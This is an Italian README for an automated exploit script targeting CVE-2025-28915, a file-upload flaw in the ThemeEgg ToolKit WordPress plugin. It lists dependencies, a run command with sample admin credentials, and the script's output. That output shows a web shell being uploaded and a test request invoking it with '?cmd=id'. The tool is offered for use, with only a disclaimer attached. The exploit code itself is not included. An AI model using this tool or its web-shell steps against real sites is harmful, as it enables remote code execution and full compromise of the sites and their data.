
Plugin WordPress ThemeEgg ToolKit <= 1.2.9 - Vulnerabilità di caricamento arbitrario di file
Una vulnerabilità di Unrestricted File Upload nel plugin ThemeEgg ToolKit per WordPress (versioni ≤ 1.2.9) consente a attaccanti autenticati di caricare web shell sul server. Ciò può portare a esecuzione remota di codice (RCE), compromissione totale del sito web e accesso non autorizzato ai dati sensibili.
Questo script automatizza lo sfruttamento di CVE-2025-28915:
requests, beautifulsoup4pip install requests beautifulsoup4
python CVE-2025-28915.py -u http://192.168.100.74:888/wordpress -un admin -p password123
| Argomento | Descrizione |
|---|---|
-u | URL WordPress di destinazione (es. http://target.com/wordpress) |
-un | Nome utente WordPress |
-p | Password WordPress |
[+] Vulnerable version detected: 1.2.9
[+] Logged in successfully.
[+] Found security nonce: f82467a997
[*] Uploading Web Shell...
[+] Web Shell uploaded successfully!
[+] Potential Web Shell location: http://target.com/wp-content/uploads/2025/03/shell.php
[*] Test command: http://target.com/wp-content/uploads/2025/03/shell.php?cmd=id
Questo script è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati. L'uso non autorizzato è illegale e non etico. L'autore non si assume alcuna responsabilità per un uso improprio.
Di: Khaled Alenazi (Nxploit)